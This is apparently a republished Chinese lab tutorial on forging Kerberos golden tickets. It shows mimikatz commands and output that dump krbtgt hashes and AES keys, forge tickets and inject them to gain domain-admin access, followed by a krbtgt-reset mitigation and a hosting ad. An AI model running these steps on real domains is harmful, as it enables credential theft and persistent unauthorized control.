當(dāng)域***成功后,域控制器已被攻陷,這時***者通常需要維持域中權(quán)限,持久控制域控制器。本文中提到的golden ticket(黃金票據(jù))主要是利用微軟Kerberos協(xié)議缺陷和域中krbtgt賬號的信息,可生成任意TGT,該TGT可用于當(dāng)前域中Kerberos認(rèn)證的任何服務(wù)。***者只需要保存krbtgt賬號中的信息生成golden ticket注入內(nèi)存當(dāng)中,即可擁有權(quán)限,且該票據(jù)的有效期是十年。
域控制器 2008r2 dc.test.com 192.168.3.100
域內(nèi)機器 2008r2 client.test.com 192.168.3.10
域外機器 win7 xxxxxx.xxx 192.168.3.18
只能去翻看日志咯~~~~
包括Server SID、NTLM或aes256或aes128,在域控制器上使用mimikatz操作
C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::lsa /patch
Domain : TEST / S-1-5-21-1406004368-3818689962-3591297438
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 80c073620041d7cc60c36ea12bdecb5d
//只摘重點部分展示
抓取aes256,需要使用另外的命令,aes256和NTLM只需要一個即可
C:\Users\Administrator\Desktop>mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:test.com /user:krbtgt" "exit"
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /domain:test.com /user:krbtgt
[DC] 'test.com' will be the domain
[DC] 'dc.test.com' will be the DC server
[DC] 'krbtgt' will be the user account
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : TEST.COMkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 7a615ae0d4b62a304ab086749b87ec0933dccb62c15e9fc2ca176bd4cf5ee8c5
aes128_hmac (4096) : aeb64a10f1fa77b344fb873ba04fa755
des_cbc_md5 (4096) : dcd9ec620b26f7df
rc4_plain (4096) : 80c073620041d7cc60c36ea12bdecb5d
先使用NTLM來生成票據(jù)
C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /krbtgt:NTLM /ticket:test.kirbi" "exit"
執(zhí)行后會在當(dāng)前目錄生成票據(jù),名為test.kirbi
aes256生成票據(jù)
C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /aes256:值 /ticket:xxx.kirbi" "exit"
執(zhí)行后會在當(dāng)前目錄生成票據(jù),名為xxx.kirbi
aes128同256,將參數(shù)名修改和值即可/aes128:xxx
分別使用兩臺機器進行測試,一臺為域內(nèi)成員機器,一臺為域外成員機器,測試是否能通過票據(jù)使任意能聯(lián)通域的機器獲取到域管理權(quán)限!將票據(jù)保存到兩臺機器上
!未注入票據(jù)前,域內(nèi)機器不能直接訪問域控制器
mimikatz # kerberos::ptt aes256.kirbi #xxx.kirbi為文件名
!注入票據(jù)后,成功訪問域控制器
需要注意的是,域外機器先得將dns指向域控制器或域內(nèi)dns服務(wù)器,否則無法解析主機名
可以正常解析!
機器不在域中
!未注入票據(jù)前,域外機器不能直接訪問域控制器
!注入票據(jù)后,域外機器成功訪問域控制器
當(dāng)域被***后,不止要重置域管理員密碼,還需要重置krbtgt賬戶密碼,且需要重置兩次,才能使golden ticket失效,否則擁有g(shù)olden ticket的***者將可以隨便進出域中
另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務(wù)器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機、免備案服務(wù)器”等云主機租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場景需求。
名稱欄目:域后續(xù)之goldenticket-創(chuàng)新互聯(lián)
轉(zhuǎn)載來源:http://chinadenli.net/article48/deeshp.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站設(shè)計、服務(wù)器托管、電子商務(wù)、品牌網(wǎng)站制作、做網(wǎng)站、網(wǎng)頁設(shè)計公司
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容